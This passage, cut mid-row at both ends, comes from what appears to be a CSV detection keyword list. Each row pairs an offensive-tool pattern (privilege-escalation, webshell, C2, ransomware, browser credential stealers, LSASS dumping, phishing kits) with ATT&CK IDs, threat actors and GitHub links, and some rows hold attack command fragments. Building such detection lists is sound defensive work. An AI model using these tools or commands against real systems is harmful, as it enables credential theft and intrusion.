tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","46551" "*GodPotato -*",".{0,1000}GodPotato\s\-.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46552" "*godpotato.cna*",".{0,1000}godpotato\.cna.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","0","N/A","N/A","9","1","85","9","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z","46553" "*GodPotato.cs*",".{0,1000}GodPotato\.cs.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46554" "*GodPotato.exe*",".{0,1000}GodPotato\.exe.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","1","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","46555" "*godpotato.exe*",".{0,1000}godpotato\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46556" "*GodPotato.git*",".{0,1000}GodPotato\.git.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46557" "*GodPotato-Aggressor-Script*",".{0,1000}GodPotato\-Aggressor\-Script.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","1","N/A","N/A","9","1","85","9","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z","46558" "*GodPotatoContext was not initialized*",".{0,1000}GodPotatoContext\swas\snot\sinitialized.{0,1000}","offensive_tool_keyword","GodPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","46559" "*GodPotatoContext was not initialized*",".{0,1000}GodPotatoContext\swas\snot\sinitialized.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows 
Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","46560" "*GodPotatoContext.cs*",".{0,1000}GodPotatoContext\.cs.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46561" "*GodPotato-master.zip*",".{0,1000}GodPotato\-master\.zip.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46562" "*GodPotato-NET*.exe*",".{0,1000}GodPotato\-NET.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46563" "*GodPotato-NET2.exe*",".{0,1000}GodPotato\-NET2\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46564" "*GodPotato-NET35.exe*",".{0,1000}GodPotato\-NET35\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46565" "*GodPotato-NET4.exe*",".{0,1000}GodPotato\-NET4\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46566" "*GodPotato-NET4.exe*",".{0,1000}GodPotato\-NET4\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","1","N/A","N/A","10","1","85","9","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z","46567" "*GodPotatoUnmarshalTrigger.cs*",".{0,1000}GodPotatoUnmarshalTrigger\.cs.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46568" "*Godzilla-1.0.jar*",".{0,1000}Godzilla\-1\.0\.jar.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","46569" "*go-external-c2*",".{0,1000}go\-external\-c2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","46570" "*GoFetchAD/GoFetch*",".{0,1000}GoFetchAD\/GoFetch.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","1","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","46571" "*gohaleygoandhackawaythegibson*",".{0,1000}gohaleygoandhackawaythegibson.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","46574" "*golang_c2-master*",".{0,1000}golang_c2\-master.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","46575" "*golden_ticket.py*",".{0,1000}golden_ticket\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black 
Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","46576" "*golden_ticket.rb*",".{0,1000}golden_ticket\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","46577" "*goldencopy * --password * --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 *",".{0,1000}goldencopy\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-stealth\s\-\-krbtgt\s060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46578" "*GoldenGMSA.exe*",".{0,1000}GoldenGMSA\.exe.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","N/A","7","2","144","22","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z","46579" "*GoldenGMSA-main*",".{0,1000}GoldenGMSA\-main.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","N/A","7","2","144","22","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z","46580" "*goldenPac.py*",".{0,1000}goldenPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","46581" "*goliate/hidden-tear*",".{0,1000}goliate\/hidden\-tear.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","46582" "*go-lsass --host *",".{0,1000}go\-lsass\s\-\-host\s.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","#linux","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","46583" "*goMatrixC2.go*",".{0,1000}goMatrixC2\.go.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","N/A","10","","N/A","","","","46584" "*goMatrixC2-main*",".{0,1000}goMatrixC2\-main.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as 
Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","N/A","10","","N/A","","","","46585" "*google_drive_doubledrive.exe*",".{0,1000}google_drive_doubledrive\.exe.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","46588" "*google_drive_ransomware.py*",".{0,1000}google_drive_ransomware\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","46589" "*google-chrome/cookies.txt*",".{0,1000}google\-chrome\/cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46590" "*google-chrome/credit_cards.txt*",".{0,1000}google\-chrome\/credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - 
TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46591" "*google-chrome/history.txt*",".{0,1000}google\-chrome\/history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46592" "*google-chrome/login_data.txt*",".{0,1000}google\-chrome\/login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46593" "*google-chrome\cookies.txt*",".{0,1000}google\-chrome\\cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46594" "*google-chrome\credit_cards.txt*",".{0,1000}google\-chrome\\credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - 
T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46595" "*google-chrome\history.txt*",".{0,1000}google\-chrome\\history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46596" "*google-chrome\login_data.txt*",".{0,1000}google\-chrome\\login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46597" "*googlechromeauto.serveirc.com*",".{0,1000}googlechromeauto\.serveirc\.com.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","46598" "*GoogleChromeAutoLaunch_9921366102WEAD21312ESAD31312*",".{0,1000}GoogleChromeAutoLaunch_9921366102WEAD21312ESAD31312.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can 
bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#registry","registry value","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","46599" "*google-get-pdf-metadata *",".{0,1000}google\-get\-pdf\-metadata\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46601" "*google-get-rootdomains *",".{0,1000}google\-get\-rootdomains\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46602" "*goPassGen-master*",".{0,1000}goPassGen\-master.{0,1000}","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tool","https://github.com/bigb0sss/goPassGen","1","1","N/A","N/A","8","1","21","1","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z","46603" "*gopherus --exploit mysql*",".{0,1000}gopherus\s\-\-exploit\smysql.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46604" 
"*gophish*phish.go*",".{0,1000}gophish.{0,1000}phish\.go.{0,1000}","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","46605" "*gophish.go*",".{0,1000}gophish\.go.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","46606" "*gophish/gophish*",".{0,1000}gophish\/gophish.{0,1000}","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. 
It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","46607" "*gophish-send-mail.py*",".{0,1000}gophish\-send\-mail\.py.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","46608" "*GoRelayServer.dll*",".{0,1000}GoRelayServer\.dll.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","46609" "*gorsair -t *",".{0,1000}gorsair\s\-t\s.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tool","https://github.com/Ullaakut/Gorsair","1","0","N/A","N/A","N/A","9","851","70","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z","46610" "*go-secdump -*",".{0,1000}go\-secdump\s\-.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential 